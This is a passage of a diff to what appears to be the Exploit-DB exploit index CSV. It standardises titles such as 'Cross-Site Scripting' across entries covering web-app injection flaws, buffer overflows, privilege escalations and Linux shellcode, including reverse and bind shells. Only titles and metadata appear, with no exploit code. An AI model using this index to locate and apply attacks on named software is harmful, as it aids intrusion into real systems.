Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 -36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting",2011-11-30,Am!r,php,webapps,0 +36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 @@ -32824,24 +32824,24 @@ id,file,description,date,author,platform,type,port 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting",2011-12-31,6Scan,php,webapps,0 +36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 -36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross Site Scripting",2011-12-06,Am!r,php,webapps,0 +36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 -36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 +36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,Metasploit,java,remote,9200 -36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 - 's' Parameter Cross Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 -36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 -36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross Site Scripting",2012-01-02,sonyy,php,webapps,0 +36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 +36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting",2012-01-02,sonyy,php,webapps,0 36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 @@ -32856,13 +32856,13 @@ id,file,description,date,author,platform,type,port 36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 -36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 +36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,linux,local,0 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash PoC",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 -36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 +36432,platforms/php/webapps/36432.txt,"Pet Listing 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 -36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross Site Scripting",2011-12-12,Am!r,php,webapps,0 +36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 @@ -32872,20 +32872,20 @@ id,file,description,date,author,platform,type,port 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix NITRO SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service and Unspecified Vulnerabilitiies",2011-12-12,anonymous,windows,dos,0 -36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross Site Scripting",2011-12-13,Am!r,php,webapps,0 -36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross Site Scripting",2011-12-31,Am!r,php,webapps,0 -36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 Multiple Cross Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 -36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 +36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 +36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 +36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 +36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 modules/Documents/index.php contact_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - Multiple Script URI XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 license/index.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36452,platforms/php/webapps/36452.txt,"BrowserCRM 5.100.1 licence/view.php framed Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - pub/clients.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - index.php login[] Parameter XSS",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36455,platforms/multiple/remote/36455.txt,"Nagios XI Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0 +36455,platforms/multiple/remote/36455.txt,"Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-12-14,anonymous,multiple,remote,0 36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 -36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0 +36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0 36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0 36459,platforms/cgi/webapps/36459.txt,"Websense 7.6 Products 'favorites.exe' Authentication Bypass",2011-12-15,"Ben Williams",cgi,webapps,0 36460,platforms/php/webapps/36460.txt,"Flirt-Projekt 4.8 - 'rub' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0 @@ -32895,31 +32895,31 @@ id,file,description,date,author,platform,type,port 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 -36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross Site Scripting",2011-12-19,G13,php,webapps,0 +36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 -36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 Multiple Cross Site Scripting and SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0 +36471,platforms/php/webapps/36471.txt,"PHPShop CMS 3.4 - Multiple Cross-Site Scripting and SQL Injection",2011-12-20,"High-Tech Bridge SA",php,webapps,0 36472,platforms/php/webapps/36472.txt,"Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36473,platforms/php/webapps/36473.txt,"Cyberoam UTM 10 - 'tableid' Parameter SQL Injection",2011-12-20,"Benjamin Kunz Mejri",php,webapps,0 -36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0 -36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 +36474,platforms/php/webapps/36474.txt,"epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-21,"High-Tech Bridge SA",php,webapps,0 +36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 -36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 -36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross Site Scripting",2012-01-03,Atmon3r,php,webapps,0 -36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 +36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 +36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 -36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 +36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 -36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross Site Scripting",2011-12-29,SiteWatch,php,webapps,0 -36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross Site Scripting",2012-01-04,sonyy,php,webapps,0 -36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 -36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 +36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 +36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 +36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 +36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 Directory Traversal",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 36502,platforms/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -32927,14 +32927,14 @@ id,file,description,date,author,platform,type,port 36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass",2012-01-10,"Adi Cohen",windows,remote,0 -36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 +36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 - 'extensions.php' Script Cross-Site Scripting",2012-01-05,"Stefan Schurtz",php,webapps,0 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36510,platforms/php/webapps/36510.txt,"SQLiteManager 1.2.4 index.php Multiple Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 36511,platforms/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 HTML Injection",2012-12-27,"Vulnerability Research Laboratory",hardware,remote,0 36512,platforms/php/webapps/36512.txt,"eFront 3.6.10 - 'download' Parameter Directory Traversal",2012-01-06,"Chokri B.A",php,webapps,0 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal",2012-01-06,demonalex,windows,remote,0 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow",2012-01-06,demonalex,windows,remote,0 -36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection",2012-01-07,"BHG Security Center",asp,webapps,0 +36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross-Site Scripting and SQL Injection",2012-01-07,"BHG Security Center",asp,webapps,0 36516,platforms/windows/remote/36516.py,"Acunetix 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 @@ -32956,22 +32956,22 @@ id,file,description,date,author,platform,type,port 36534,platforms/php/webapps/36534.txt,"MARINET CMS room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 -36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 -36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0 -36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross Site Scripting",2012-01-09,Am!r,php,webapps,0 +36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 +36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injection / Cross-Site Scripting",2012-01-09,sonyy,php,webapps,0 +36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,php,webapps,0 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 -36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross Site Scripting",2012-01-10,Am!r,php,webapps,0 +36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,php,webapps,0 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 -36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 +36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0 -36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 +36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0 36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 -36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross Site Scripting",2012-01-16,Atmon3r,php,webapps,0 -36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 -36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36550,platforms/php/webapps/36550.txt,"PHP Membership Site Manager Script 2.1 - 'index.php' Cross-Site Scripting",2012-01-16,Atmon3r,php,webapps,0 +36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 +36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider Revolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 @@ -32980,11 +32980,11 @@ id,file,description,date,author,platform,type,port 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0 36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0 -36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 -36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 -36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 -36568,platforms/php/webapps/36568.txt,"Giveaway Manager 'members.php' Cross Site Scripting",2012-01-16,Am!r,php,webapps,0 -36569,platforms/php/webapps/36569.txt,"Annuaire PHP 'sites_inscription.php' Multiple Cross Site Scripting Vulnerabilities",2012-01-16,Atmon3r,php,webapps,0 +36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36567,platforms/php/webapps/36567.txt,"phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 +36568,platforms/php/webapps/36568.txt,"Giveaway Manager 'members.php' Cross-Site Scripting",2012-01-16,Am!r,php,webapps,0 +36569,platforms/php/webapps/36569.txt,"Annuaire PHP 'sites_inscription.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-16,Atmon3r,php,webapps,0 36570,platforms/multiple/dos/36570.txt,"Rockwell Automation FactoryTalk Activation Server - Multiple Denial of Service Vulnerabilities",2012-01-17,"Luigi Auriemma",multiple,dos,0 36571,platforms/linux/local/36571.sh,"OverlayFS inode Security Checks 'inode.c' Local Security Bypass",2012-01-17,"Gary Poster",linux,local,0 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection",2012-01-18,Lazmania61,php,webapps,0 @@ -32997,13 +32997,13 @@ id,file,description,date,author,platform,type,port 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After 